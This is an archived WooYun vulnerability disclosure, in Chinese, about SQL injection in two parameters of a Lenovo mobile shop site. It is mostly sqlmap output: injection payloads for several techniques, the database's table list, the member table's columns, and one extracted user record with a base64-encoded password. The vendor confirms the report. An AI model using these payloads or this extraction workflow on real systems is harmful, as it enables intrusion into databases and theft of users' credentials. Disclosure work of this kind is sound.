乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-23: 细节已通知厂商并且等待厂商处理中 2013-08-23: 厂商已经确认,细节仅向厂商公开 2013-09-02: 细节向核心白帽子及相关领域专家公开 2013-09-12: 细节向普通白帽子公开 2013-09-22: 细节向实习白帽子公开 2013-10-07: 细节向公众公开
无聊就跟着小胖子到处逛咯~~~
第一枚:
http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8199
第二枚(需要登录状态):
http://ess.lenovomobile.com/shopDtl.aspx?GdsID=A0900001586
---Place: GETParameter: MbrID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: MbrID=8199 AND 5966=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5966=5966) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: MbrID=-3869 UNION ALL SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)+CHAR(113)+CHAR(81)+CHAR(98)+CHAR(79)+CHAR(84)+CHAR(85)+CHAR(98)+CHAR(89)+CHAR(67)+CHAR(98)+CHAR(114)+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: MbrID=8199; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: MbrID=8199 WAITFOR DELAY '0:0:5'-----[13:32:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
第二枚:
---Place: GETParameter: GdsID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: GdsID=A0900001586') AND 3859=3859 AND ('Twim'='Twim Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: GdsID=A0900001586') AND 3193=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(100)+CHAR(101)+CHAR(113)+(SELECT (CASE WHEN (3193=3193) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(117)+CHAR(105)+CHAR(113))) AND ('MLFY'='MLFY Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: GdsID=A0900001586'); WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: GdsID=A0900001586') WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
当前库
表
Database: lmshop[89 tables]+--------------------------+| EssCarDtl || EssCarMst || EssCmpRegiForm || EssFavorites || EssGoods || EssGoodsColor || EssGoodsPresent || EssGoodsPrice_Log || EssMember || EssOrder || EssSales || EssSalesGoods || EssSalesMail || EssVerifyCode || JB_QuickLogin || MailBasSet || MailSet || MailTemplate || MailToDtl || MailToGrp || MstCode || MstCsErr || MstCsLog || MstCsMenu || MstCsUser || MstMenu || MstMessage || MstRole || MstRoleMenu || MstRoleUser || MstUser || PmtActivities || PmtAttach || PmtAttendance || PmtFee || PmtGoods || PmtImg || PmtImgSize || PmtOrder || PmtOrderWithDraw || PmtPromoter || PmtQA || PmtSettle || PmtSettleDtl || PmtSettleOrder || PmtSettleOrderTmp || PmtSettleSim || PmtSettleSimDtl || PmtVerifyCode || RECEIVE || SEND || SellBigOrder || SellCustomize || SellJoinEnterprise || SellJoinPerson || ShopCard || SmsBasSet || SmsClass || SmsDueSend || SmsDueSendRec || SmsNormalIF || SmsNormalIFCC111021 || SmsNormalIfRec || SmsReceive || SmsReceiveType || SmsSend || SmsSend100601 || SmsSend100602 || SmsSendRec || SmsSysSet || SmsTempIF || SmsTempIfRec || SmsTemplate || SmsUserRight || SmsWhiteBlackBill || TrnFeedback || TrnNews || V_EssGoodsPrice || V_GetPayTypeByDistrictID || V_OrderGoodsType || V_PmtFee || V_UserMenu || ZSmsNormalIF100601 || ZSmsNormalIF110916 || ZSmsNormalIF111018 || bakUp_LMmbrid || dtproperties || pangolin_test_table || sms.SmsNormalIFCC |+--------------------------+
用户表里有啥字段
Database: lmshopTable: EssMember[12 columns]+-----------+----------+| Column | Type |+-----------+----------+| Email | varchar || IsValid | nvarchar || MbrID | bigint || MbrName | varchar || Password | nvarchar || Phone | nvarchar || RegDate | datetime || RegID | nvarchar || SalesCode | varchar || SalesID | bigint || UpdDate | datetime || UpdID | nvarchar |+-----------+----------+
看看多少数据
Database: lmshop+---------------+---------+| Table | Entries |+---------------+---------+| dbo.EssMember | 8198 |+---------------+---------+
然后跑了条用户数据,居然是base64有木有!!!这和明文有什么区别!!!
[13:53:00] [INFO] retrieved: [email protected][13:53:00] [INFO] retrieved:[13:53:01] [INFO] retrieved:[13:53:01] [INFO] retrieved:[13:53:02] [INFO] retrieved: 1[13:53:02] [INFO] retrieved: lihe[13:53:02] [INFO] retrieved: 05 20 2009 11:27AM[13:53:03] [INFO] retrieved: 1[13:53:03] [INFO] retrieved: 05 20 2009 11:27AM[13:53:04] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==
过滤什么的
危害等级:高
漏洞Rank:20
确认时间:2013-08-23 16:30
感谢VIP同学对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无